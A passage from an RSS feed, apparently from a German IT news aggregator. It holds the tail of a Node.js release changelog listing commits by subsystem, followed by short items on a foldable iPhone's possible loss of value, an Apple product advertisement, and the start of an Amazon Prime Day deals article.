<li>[<a href="https://github.com/nodejs/node/commit/12c51547ba"><code>12c51547ba</code></a>] - <strong>lib</strong>: fix typos in esm loader comments (RonGamzu) <a href="https://github.com/nodejs/node/pull/63465" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63465/hovercard">#63465</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b03b84262"><code>9b03b84262</code></a>] - <strong>lib</strong>: fix typo idenity =&gt; identity (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63112" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63112/hovercard">#63112</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a84e6b0567"><code>a84e6b0567</code></a>] - <strong>lib</strong>: fixes validator message (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62823" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62823/hovercard">#62823</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11734166a8"><code>11734166a8</code></a>] - <strong>lib</strong>: narrow ReadableStreamBYOBRequest.view return type to Uint8Array (RoomWithOutRoof) <a href="https://github.com/nodejs/node/pull/63017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63017/hovercard">#63017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7cead61d21"><code>7cead61d21</code></a>] - <strong>meta</strong>: flip mcollina emails in .mailmap (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63621" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63621/hovercard">#63621</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a08cfcfd35"><code>a08cfcfd35</code></a>] - <strong>meta</strong>: label "source maps" PRs (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63591" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63591/hovercard">#63591</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d56e8d2512"><code>d56e8d2512</code></a>] - <strong>meta</strong>: add <code>vfs</code> subsystem label (René) <a href="https://github.com/nodejs/node/pull/62331" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62331/hovercard">#62331</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6201cfe488"><code>6201cfe488</code></a>] - <strong>meta</strong>: skip scheduled workflows on forks (Jamie Magee) <a href="https://github.com/nodejs/node/pull/63565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63565/hovercard">#63565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f095e2bd31"><code>f095e2bd31</code></a>] - <strong>meta</strong>: add additional gitignore entries (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1ea52c444c"><code>1ea52c444c</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63402" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63402/hovercard">#63402</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b1b2327611"><code>b1b2327611</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63235" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63235/hovercard">#63235</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d88e130a9"><code>7d88e130a9</code></a>] - <strong>meta</strong>: ignore AI assistants files (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62612/hovercard">#62612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a53b51df38"><code>a53b51df38</code></a>] - <strong>module</strong>: load ESM helpers eagerly in the snapshot (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63550" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63550/hovercard">#63550</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/69df688fff"><code>69df688fff</code></a>] - <strong>module</strong>: fix sync hook short-circuit in require() in imported CJS (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/62920" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62920/hovercard">#62920</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75d9a4ed47"><code>75d9a4ed47</code></a>] - <strong>node-api</strong>: support SharedArrayBuffer in napi_create_typedarray (Yilong Li) <a href="https://github.com/nodejs/node/pull/62710" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62710/hovercard">#62710</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c20aa4c47b"><code>c20aa4c47b</code></a>] - <strong>quic</strong>: add reusePort option to QuicEndpoint (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26a30d8a7f"><code>26a30d8a7f</code></a>] - <strong>quic</strong>: implement rate limiting for version nego and immediate close (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b534b5770"><code>0b534b5770</code></a>] - <strong>quic</strong>: fixup linting issue after other changes (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b367cbe09"><code>4b367cbe09</code></a>] - <strong>quic</strong>: remove unused binding variable in session.cc (James M Snell) <a href="https://github.com/nodejs/node/pull/63177" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63177/hovercard">#63177</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2574bef5a6"><code>2574bef5a6</code></a>] - <strong>repl</strong>: fix dedup comparing normalized line against raw history (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62886" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62886/hovercard">#62886</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/30e71c7e49"><code>30e71c7e49</code></a>] - <strong>sqlite</strong>: keep source database alive during backup (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62673" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62673/hovercard">#62673</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/677ca7e76c"><code>677ca7e76c</code></a>] - <strong>src</strong>: simplify OpenSSL feature gates (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c863c75c39"><code>c863c75c39</code></a>] - <strong>src</strong>: add BoringSSL EVP enumeration fallback (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63206" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63206/hovercard">#63206</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f6b2466921"><code>f6b2466921</code></a>] - <strong>src</strong>: decouple KeyObject and CryptoKey and move CryptoKey to src (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62924" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62924/hovercard">#62924</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/92d4f07dd2"><code>92d4f07dd2</code></a>] - <strong>src</strong>: remove license headers for new node_profiling files (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63066" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63066/hovercard">#63066</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8ac5d771c8"><code>8ac5d771c8</code></a>] - <strong>src</strong>: split profiling helpers from util (Ilyas Shabi) <a href="https://github.com/nodejs/node/pull/63008" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63008/hovercard">#63008</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/85d1639495"><code>85d1639495</code></a>] - <strong>src</strong>: remove TOCTOU race condition when encoding SAB-backed <code>Buffer</code>s (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63517" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63517/hovercard">#63517</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9473c5f05c"><code>9473c5f05c</code></a>] - <strong>src</strong>: skip duplicate UTF-8 validation in TextDecoder fatal path (Mert Can Altin) <a href="https://github.com/nodejs/node/pull/63231" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63231/hovercard">#63231</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f35c91ee68"><code>f35c91ee68</code></a>] - <strong>src</strong>: improve token return value check (James M Snell) <a href="https://github.com/nodejs/node/pull/63483" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63483/hovercard">#63483</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26f677c1c5"><code>26f677c1c5</code></a>] - <strong>src</strong>: expose <code>node::RegisterContext</code> to make a node managed context (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/62322" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62322/hovercard">#62322</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/275cf909b6"><code>275cf909b6</code></a>] - <strong>src,sqlite</strong>: only pass <code>xFilter</code> when user provided a callback (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63516" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63516/hovercard">#63516</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/287e02303f"><code>287e02303f</code></a>] - <strong>src,sqlite</strong>: remove dead code (Edy Silva) <a href="https://github.com/nodejs/node/pull/63204" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63204/hovercard">#63204</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58fa2ee189"><code>58fa2ee189</code></a>] - <strong>stream</strong>: switch to internal <code>sleep</code> binding (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63611" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63611/hovercard">#63611</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f954ab3f1a"><code>f954ab3f1a</code></a>] - <strong>stream</strong>: use data listener for compose forwarding (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63593" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63593/hovercard">#63593</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dc57173003"><code>dc57173003</code></a>] - <strong>stream</strong>: fix Writable.toWeb() hang on synchronous drain (sangwook) <a href="https://github.com/nodejs/node/pull/61197" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/61197/hovercard">#61197</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cee279c5d6"><code>cee279c5d6</code></a>] - <strong>stream</strong>: remove unnecessary check (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63030" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63030/hovercard">#63030</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61b20f60a3"><code>61b20f60a3</code></a>] - <strong>test</strong>: update tls/crypto behaviour expectations when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a835363808"><code>a835363808</code></a>] - <strong>test</strong>: update WPT for WebCryptoAPI to 97bbc7247a (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63417" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63417/hovercard">#63417</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a00297480b"><code>a00297480b</code></a>] - <strong>test</strong>: update WPT resources, interfaces and WebCryptoAPI (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62389/hovercard">#62389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5a95a2b055"><code>5a95a2b055</code></a>] - <strong>test</strong>: shorten path in net pipe connect errors (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63405" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63405/hovercard">#63405</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5e8ff22d8f"><code>5e8ff22d8f</code></a>] - <strong>test</strong>: remove test-node-output-v8-warning (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63469" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63469/hovercard">#63469</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee15380950"><code>ee15380950</code></a>] - <strong>test</strong>: update test426-fixtures to 9b9e225b5a63139e9a95cdd1bf874a8f0b9d131 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63373" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63373/hovercard">#63373</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9e063d9bea"><code>9e063d9bea</code></a>] - <strong>test</strong>: update WPT for url to e4a4672e9e (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63372" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63372/hovercard">#63372</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/503bee4b43"><code>503bee4b43</code></a>] - <strong>test</strong>: deflake async-hooks statwatcher test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63396" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63396/hovercard">#63396</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cccc7c32d8"><code>cccc7c32d8</code></a>] - <strong>test</strong>: avoid test_runner watch restart in spec snapshot (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63392" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63392/hovercard">#63392</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c89489258c"><code>c89489258c</code></a>] - <strong>test</strong>: reduce watch mode restart flakiness (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63390" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63390/hovercard">#63390</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4d5e2578e"><code>e4d5e2578e</code></a>] - <strong>test</strong>: isolate rerun-failures state file under tmpdir (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63449" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63449/hovercard">#63449</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/362644a9ba"><code>362644a9ba</code></a>] - <strong>test</strong>: wait for ok before initial break after restart (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62807" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62807/hovercard">#62807</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c4058d0e05"><code>c4058d0e05</code></a>] - <strong>test</strong>: disable Maglev in near-heap-limit worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63398" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63398/hovercard">#63398</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/214da630a7"><code>214da630a7</code></a>] - <strong>test</strong>: deflake connection refused proxy tests (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63395" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63395/hovercard">#63395</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1d61a29876"><code>1d61a29876</code></a>] - <strong>test</strong>: avoid repeated writes in watch helper (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63386" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63386/hovercard">#63386</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2004e25387"><code>2004e25387</code></a>] - <strong>test</strong>: deflake watch mode worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63384" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63384/hovercard">#63384</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d691cccfc1"><code>d691cccfc1</code></a>] - <strong>test</strong>: relax test-memory-usage arrayBuffers check (inoway46) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0ff6bf853c"><code>0ff6bf853c</code></a>] - <strong>test</strong>: reduce flakiness of <code>different-registry-per-thread</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d9f4e8e503"><code>d9f4e8e503</code></a>] - <strong>test</strong>: fix flaky test-watch-mode-inspect timeout (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63361" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63361/hovercard">#63361</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d7cd50328"><code>6d7cd50328</code></a>] - <strong>test</strong>: relax min assertion in test-performance-eventloopdelay (Marco) <a href="https://github.com/nodejs/node/pull/63100" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63100/hovercard">#63100</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9dafe1d2d8"><code>9dafe1d2d8</code></a>] - <strong>test</strong>: avoid flaky restart sync in debugger exceptions test (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62055" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62055/hovercard">#62055</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/989b2de973"><code>989b2de973</code></a>] - <strong>test</strong>: avoid initial-break wait in restart-message (inoway46) <a href="https://github.com/nodejs/node/pull/62060" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62060/hovercard">#62060</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a072a25ee7"><code>a072a25ee7</code></a>] - <strong>test</strong>: move FFI tests to <code>NATIVE_SUITES</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63165" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63165/hovercard">#63165</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/64efbfd878"><code>64efbfd878</code></a>] - <strong>test</strong>: use ERM to destroy sqlite database handles after tests (René) <a href="https://github.com/nodejs/node/pull/63076" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63076/hovercard">#63076</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7dee66cd94"><code>7dee66cd94</code></a>] - <strong>test_runner</strong>: dont buffer unordered events in process isolation mode (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63432" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63432/hovercard">#63432</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d257eec1e3"><code>d257eec1e3</code></a>] - <strong>test_runner</strong>: fix --test-rerun-failures swallowing failures on retry (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63431" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63431/hovercard">#63431</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/288c320e2f"><code>288c320e2f</code></a>] - <strong>test_runner</strong>: show replayed-from-attempt hint in spec reporter (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/904bdf5bb4"><code>904bdf5bb4</code></a>] - <strong>test_runner</strong>: preserve run duration when using test-rerun (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df183d7bfa"><code>df183d7bfa</code></a>] - <strong>test_runner</strong>: avoid hanging on incomplete v8 frames (Ali Hassan) <a href="https://github.com/nodejs/node/pull/62704" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62704/hovercard">#62704</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ec86c69726"><code>ec86c69726</code></a>] - <strong>test_runner</strong>: fix diagnostics channel context tracking (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63283" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63283/hovercard">#63283</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/94e5f63b83"><code>94e5f63b83</code></a>] - <strong>tls</strong>: add unsupported renegotiation error (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/06d308fb61"><code>06d308fb61</code></a>] - <strong>tools</strong>: prevent lib code from reading KeyObject and CryptoKey accessors (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2e4a0d0c91"><code>2e4a0d0c91</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.5 to 5.0.6 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63415" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63415/hovercard">#63415</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9666b366"><code>4c9666b366</code></a>] - <strong>tools</strong>: skip commit-lint on backport pull requests (Marco) <a href="https://github.com/nodejs/node/pull/63378" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63378/hovercard">#63378</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/67d0c490a8"><code>67d0c490a8</code></a>] - <strong>tools</strong>: fix skip of <code>test-internet</code> on forks (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63492" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63492/hovercard">#63492</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f73c7cac"><code>02f73c7cac</code></a>] - <strong>tools</strong>: bump the eslint group in /tools/eslint with 4 updates (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63075" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63075/hovercard">#63075</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5d016d3241"><code>5d016d3241</code></a>] - <strong>tools</strong>: update gyp-next to 0.22.2 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63374" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63374/hovercard">#63374</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/55af0f0edb"><code>55af0f0edb</code></a>] - <strong>tools</strong>: fix test426 updater (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63271" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63271/hovercard">#63271</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d8475e167a"><code>d8475e167a</code></a>] - <strong>tools</strong>: use different branch for tool updates on staging branches (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63110" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63110/hovercard">#63110</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c605df9e50"><code>c605df9e50</code></a>] - <strong>util</strong>: remove unused functions (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63612/hovercard">#63612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe4540ebdb"><code>fe4540ebdb</code></a>] - <strong>util</strong>: create hex style cache and fast path (Guilherme Araújo) <a href="https://github.com/nodejs/node/pull/62999" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62999/hovercard">#62999</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Apple’s foldable iPhone could plummet in value]]></title>
<description><![CDATA[A new analysis says an Apple foldable iPhone could plummet in value -- unless Cupertino's quality-and-integration magic works yet again.
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3618934/ios-mac-os/why-apples-foldable-iphone-could-plummet-in-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618934/ios-mac-os/why-apples-foldable-iphone-could-plummet-in-value/</guid>
<pubDate>Tue, 23 Jun 2026 18:27:55 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="780" height="439" src="https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-1440x810.jpg.webp" class="attachment-large size-large wp-post-image" alt="Why Apple’s foldable iPhone could plummet in value" decoding="async" fetchpriority="high" srcset="https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-1440x810.jpg.webp 1440w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-400x225.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-768x432@2x.jpg.webp 1536w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-768x432.jpg.webp 768w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-1020x574.jpg.webp 1020w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021.jpg.webp 1678w, https://www.cultofmac.com/wp-content/uploads/2026/06/Folding-iPhone_Concept_021-400x225@2x.jpg 800w" sizes="(max-width: 780px) 100vw, 780px"></div>
<p>A new analysis says an Apple foldable iPhone could plummet in value -- unless Cupertino's quality-and-integration magic works yet again.</p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anzeige: Apple Airpods 4 und Magic Mouse jetzt zum Prime-Day-Bestpreis]]></title>
<description><![CDATA[Zum Prime Day sind auch diese sonst sehr preisstabilen Apple-Produkte bei Amazon im Angebot. (Prime Day, Apple)]]></description>
<link>https://tsecurity.de/de/3617440/it-nachrichten/anzeige-apple-airpods-4-und-magic-mouse-jetzt-zum-prime-day-bestpreis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617440/it-nachrichten/anzeige-apple-airpods-4-und-magic-mouse-jetzt-zum-prime-day-bestpreis/</guid>
<pubDate>Tue, 23 Jun 2026 09:17:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zum Prime Day sind auch diese sonst sehr preisstabilen Apple-Produkte bei Amazon im Angebot. (<a href="https://www.golem.de/specials/prime-day/">Prime Day</a>, <a href="https://www.golem.de/specials/apple/">Apple</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=210058&amp;page=1&amp;ts=1782198782" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Der Amazon Prime Day ist gestartet – diese Tagesangebote lohnen sich]]></title>
<description><![CDATA[Seit heute Mitternacht läuft bei Amazon der Amazon Prime Day 2026. Prime-Mitglieder haben jetzt vier Tage lang Zeit, von Bestpreisen für bekannte Markenprodukte zu profitieren. Der Prime Day endet am Freitag, den 26. Juni.



Die besten Tagesangebote am Amazon Prime Day



Rabatte gelten ausschli...]]></description>
<link>https://tsecurity.de/de/3617348/it-nachrichten/der-amazon-prime-day-ist-gestartet-diese-tagesangebote-lohnen-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617348/it-nachrichten/der-amazon-prime-day-ist-gestartet-diese-tagesangebote-lohnen-sich/</guid>
<pubDate>Tue, 23 Jun 2026 08:32:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Seit heute Mitternacht läuft bei Amazon der <strong>Amazon Prime Day 2026</strong>. Prime-Mitglieder haben jetzt vier Tage lang Zeit, von Bestpreisen für bekannte Markenprodukte zu profitieren. Der Prime Day endet am <strong>Freitag, den 26. Juni.</strong></p>



<p><a href="https://www.amazon.de/primeday?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Die besten Tagesangebote am Amazon Prime Day</a></p>



<h2 class="wp-block-heading">Rabatte gelten ausschließlich für Prime-Mitglieder</h2>



